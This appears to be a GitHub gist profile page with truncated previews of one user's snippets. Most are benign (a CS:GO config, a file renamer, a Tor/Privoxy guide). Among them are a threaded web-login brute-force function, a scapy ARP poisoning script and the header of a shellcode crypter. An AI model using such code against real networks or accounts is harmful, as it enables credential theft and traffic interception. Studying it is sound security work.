Skip to content

Instantly share code, notes, and snippets.

View ReddyyZ's full-sized avatar
💻
127.0.0.1

Arthur Oliveira ReddyyZ

💻
127.0.0.1
View GitHub Profile
import requests, argparse, threading, os, time
def send_request(url, data, login, error_message, t_number):
'''
error_message = Mensagem de login errado
data = Formulario preenchido
login = Usuario e senha
t_number = Numero do thread
'''
print(f"[Thread: {t_number}] Testing: {login[0]}:{login[1]}")
@ReddyyZ
ReddyyZ / arppoison.py
Last active September 29, 2021 00:37
Script for ARP Poisoning attacks
from scapy.all import *
def get_mac_address(ip):
arp_broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip) # Cria o pacote falso de ARP Request
ans, uns = srp(arp_broadcast, timeout=2, verbose=0) # Envia o pacote e espera uma resposta
return ans[0][1][1].hwsrc
def poison_arp(dest_ip, dest_mac, src_ip):
arp_spoof = ARP(op=2, psrc=src_ip, pdst=dest_ip, hwdst=dest_mac) # Cria o pacote falso
@ReddyyZ
ReddyyZ / autoexec.cfg
Created August 17, 2020 18:53
Minha autoexec do CSGO
//MIRA
cl_crosshair_drawoutline "0.000000"
cl_crosshair_dynamic_maxdist_splitratio "0.35"
cl_crosshair_dynamic_splitalpha_innermod "1"
cl_crosshair_dynamic_splitalpha_outermod "0.5"
cl_crosshair_dynamic_splitdist "7"
cl_crosshair_outlinethickness "1.000000"
cl_crosshair_sniper_show_normal_inaccuracy "0"
cl_crosshair_sniper_width "1"
cl_crosshair_t "0.000000"
@ReddyyZ
ReddyyZ / RenomeiaArquivosEmMassa.py
Created August 7, 2020 22:10
Script para renomear vários arquivos automaticamente.
# -*- coding: utf-8 -*-
import pathlib,argparse
def arguments():
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dir',help="Dir of files",default='.',metavar='')
parser.add_argument('-b','--banned',help="Banned words to remove",nargs='+',required=True,metavar='')
@ReddyyZ
ReddyyZ / 📊 Weekly WakaTime Stats
Created May 22, 2020 22:25
📊 Weekly WakaTime Stats
a
@ReddyyZ
ReddyyZ / TorPrivoxyPython.md
Created April 18, 2020 22:15 — forked from DusanMadar/TorPrivoxyPython.md
A step-by-step guide how to use Python with Tor and Privoxy

A step-by-step guide how to use Python with Tor and Privoxy

Tested on Ubuntu 18.04 Docker container. The Dockerfile is a single line FROM ubuntu:18.04. Alternatively, you can simply run docker run -it ubuntu:18.04 bash.

NOTE: stopping services didn't work for me for some reason. That's why there is kill $(pidof <service name>) after each failed service <service name> stop to kill it.

References

This guide is basically a compilation of all the resources listed below.

/*
Compile using the following command:
$gcc aes_128_crypter.c -o aes_128_crypter -lmcrypt -fno-stack-protector -z execstack
Author: Nipun Jaswal (SLAE-1080)
*/
#include <stdio.h>
#include <string.h>
#include <mcrypt.h>